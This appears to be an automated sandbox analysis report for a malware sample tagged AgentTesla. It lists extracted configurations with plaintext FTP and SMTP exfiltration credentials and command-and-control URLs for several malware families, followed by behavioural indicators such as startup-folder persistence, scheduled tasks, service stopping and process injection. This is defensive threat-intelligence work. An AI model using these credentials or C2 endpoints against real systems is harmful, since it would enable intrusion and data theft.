agenttesla | 6b81b36622febc198dbe4596349b7b781cd6b278e9db9145a2de8b14b045e128

Analysis

max time kernel
194s
max time network
515s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2023 16:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe.zip
Size

1KB
MD5

0206983f12db26f622bbe73b165f126f
SHA1

e71f9fc602245a337f728e27917b0b716d3828f9
SHA256

6b81b36622febc198dbe4596349b7b781cd6b278e9db9145a2de8b14b045e128
SHA512

296372c60204ead1709a556001fd2a932e98814d30b42771beb19cc1298f92f3823372a83c1752f49f8073ea238e60f4c5e270a85b6dba2821621e68fd6f5cfc

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
valvulasthermovalve.cl
Port:
21
Username:
[email protected]
Password:
LILKOOLL14!!

Extracted

Family

loaderbot

http://185.236.76.77/cmd.php

Extracted

Family

smokeloader

Version

2022

http://77.91.68.29/fks/

rc4.i32

Extracted

Family

formbook

Version

4.1

Campaign

4hc5

Decoy

amandaastburyillustration.com

7141999.com

showshoe.info

sagemarlin.com

lithuaniandreamtime.com

therenixgroupllc.com

avalialooks.shop

vurporn.com

lemmy.systems

2816goldfinch.com

pacersun.com

checktrace.com

loadtransfer.site

matsuri-jujutsukaisen.com

iontrapper.science

5108010.com

beidixi.com

21305599.com

peakvitality.fitness

osisfeelingfee.com

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.greentnd.com
Port:
587
Username:
[email protected]
Password:
xAu^5p6BT2vcelhn
Email To:
[email protected]

Extracted

Family

lokibot

http://davinci.kalnet.top/_errorpages/davinci/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral1/files/0x0006000000022ff1-1326.dat	family_zgrat_v1
behavioral1/files/0x0006000000022ff1-1340.dat	family_zgrat_v1
behavioral1/files/0x0006000000022ff1-1341.dat	family_zgrat_v1
behavioral1/memory/6124-1348-0x0000000000E00000-0x0000000001242000-memory.dmp	family_zgrat_v1

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/files/0x00060000000230c8-2027.dat	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Formbook payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/7092-1779-0x0000000000400000-0x000000000042F000-memory.dmp	formbook

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral1/memory/6048-1309-0x0000000000C40000-0x000000000103E000-memory.dmp	loaderbot
behavioral1/memory/6048-1548-0x0000000000400000-0x0000000000820000-memory.dmp	loaderbot

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 12 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FjfMU65219vtcVOLZhc8RgJp.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\raeOQLG6zc4DhErnQSO6K5zL.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aKvA8lGmmomHeAsfLHd4iJ3d.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b8PaE7zvIttkshyJJQEuuui7.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JJNKVb2vkTHShYosqwifL4wy.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9gWEsPcAQ2ThBK3BUTwdbayL.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HY8aTdy4zcsE0VNOo82kiF4X.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sDUvj5PtZSYyZwxeb7ijQO1S.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qvEEwz8QRRYKjNokzC9AOR9y.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\llsWsbOzhOcGSSRBa20N7sIb.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QLUqyyCZwQBKYU3iglLzBboF.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CBIYGnCXWfbZq9hobrQrZwyi.bat	InstallUtil.exe

Executes dropped EXE 14 IoCs

pid	Process
4988	123.exe
5816	salo.exe
5264	audiodgse.exe
6048	EasySup.exe
4528	sbinzx.exe
6124	updates_installer.exe
3488	987123.exe
5472	9AxfuWmirL0COACqXNCBhFLU.exe
5692	A9N42EwNPYiI3lwCJHLhVAsU.exe
3128	NpAc7jfFe9my09gG7KFVoWfW.exe
4820	davincizx.exe
5468	24pd8fLTxjJ7eGirzhHTRQSA.exe
5584	xCqqqTLBzqOpFcrZ3Ai4GZqL.exe
6012	6BVbmmSpr4B03bav3pDt64Mo.exe

Loads dropped DLL 2 IoCs

pid	Process
6048	EasySup.exe
6048	EasySup.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000002301e-1505.dat	upx
behavioral1/memory/2352-1564-0x00000000003B0000-0x00000000008D9000-memory.dmp	upx
behavioral1/memory/7000-1689-0x00000000006F0000-0x0000000000C19000-memory.dmp	upx
behavioral1/memory/2352-1796-0x00000000003B0000-0x00000000008D9000-memory.dmp	upx
behavioral1/files/0x00070000000230f6-2244.dat	upx
behavioral1/files/0x000500000001e874-3003.dat	upx
behavioral1/files/0x000300000001ea2f-2952.dat	upx
behavioral1/files/0x000a000000009f85-3173.dat	upx
behavioral1/files/0x000600000001dad1-3161.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.159.66.125

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x0007000000023067-3528.dat	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
675	api.ipify.org
768	api.ipify.org
769	api.ipify.org
618	api.myip.com
619	ipinfo.io
692	api.ipify.org
302	ipinfo.io
303	ipinfo.io
374	api.ipify.org
300	api.myip.com
301	api.myip.com
376	api.ipify.org
617	api.myip.com
623	ipinfo.io
672	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4988 set thread context of 1048	4988	123.exe	153
PID 5816 set thread context of 2020	5816	salo.exe	158

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5820	sc.exe
2280	sc.exe
5016	sc.exe
7464	sc.exe
9092	sc.exe
7660	sc.exe
8856	sc.exe
8620	sc.exe
7712	sc.exe
8236	sc.exe
6312	sc.exe
6616	sc.exe
9132	sc.exe
848	sc.exe
8652	sc.exe
8508	sc.exe
5528	sc.exe
2528	sc.exe
5296	sc.exe
7604	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 26 IoCs

pid	pid_target	Process	procid_target
5828	6048	WerFault.exe	157
1128	3488	WerFault.exe	165
6932	5700	WerFault.exe	213
3200	6852	WerFault.exe	273
3268	5000	WerFault.exe	259
5272	652	WerFault.exe	292
5932	652	WerFault.exe	292
1352	5604	WerFault.exe	294
6668	5472	WerFault.exe	189
3500	5584	WerFault.exe	169
6424	6592	WerFault.exe	348
6764	6752	WerFault.exe	356
4080	2976	WerFault.exe	420
892	5056	WerFault.exe	393
7376	6712	WerFault.exe	435
7816	7548	WerFault.exe	473
7628	4520	WerFault.exe	417
8764	208	WerFault.exe	275
8980	8572	WerFault.exe	553
9032	208	WerFault.exe	275
6984	208	WerFault.exe	275
4652	208	WerFault.exe	275
8280	7196	WerFault.exe	491
3932	208	WerFault.exe	275
8684	7396	WerFault.exe	485
7832	208	WerFault.exe	275

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x0002000000022985-3165.dat	nsis_installer_1
behavioral1/files/0x0002000000022985-3165.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
8296	schtasks.exe
8368	schtasks.exe
1476	schtasks.exe
220	schtasks.exe
5756	schtasks.exe
2572	schtasks.exe
2852	schtasks.exe
5608	schtasks.exe
1068	schtasks.exe
4760	schtasks.exe
1920	schtasks.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
2360	timeout.exe
6336	timeout.exe
184	timeout.exe
2088	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
8268	NETSTAT.EXE
4972	NETSTAT.EXE
7256	ipconfig.exe
6500	ipconfig.exe
6940	ipconfig.exe
7724	ipconfig.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4980	taskkill.exe
5132	taskkill.exe
560	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133429842259638357"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3125601242-331447593-1512828465-1000\{F699EC8A-C38E-4EA6-9FFC-9D909CA16D0B}	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
8740	PING.EXE

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
4944	chrome.exe
4944	chrome.exe
2032	msedge.exe
2032	msedge.exe
5052	msedge.exe
5052	msedge.exe
5164	taskmgr.exe
5164	taskmgr.exe
5484	identity_helper.exe
5484	identity_helper.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
540	chrome.exe
540	chrome.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe
Token: SeShutdownPrivilege	4944	chrome.exe
Token: SeCreatePagefilePrivilege	4944	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
4944	chrome.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe
5164	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4944 wrote to memory of 3060	4944	chrome.exe	96
PID 4944 wrote to memory of 3060	4944	chrome.exe	96
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2740	4944	chrome.exe	97
PID 4944 wrote to memory of 2640	4944	chrome.exe	99
PID 4944 wrote to memory of 2640	4944	chrome.exe	99
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98
PID 4944 wrote to memory of 5036	4944	chrome.exe	98

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe.zip"
1⤵
PID:956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xf8,0x120,0x124,0xfc,0x128,0x7ffb48a99758,0x7ffb48a99768,0x7ffb48a99778
  2⤵
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:2
  2⤵
  PID:2740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  PID:2640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3208 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:1
  2⤵
  PID:3972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3188 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3716 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:1
  2⤵
  PID:4124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4744 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  PID:1752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4884 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  PID:2656
- - C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\yw6WP85.exe
    C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\yw6WP85.exe
    3⤵
    PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\1Dp67Oo9.exe
      C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\1Dp67Oo9.exe
      4⤵
      PID:1096
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
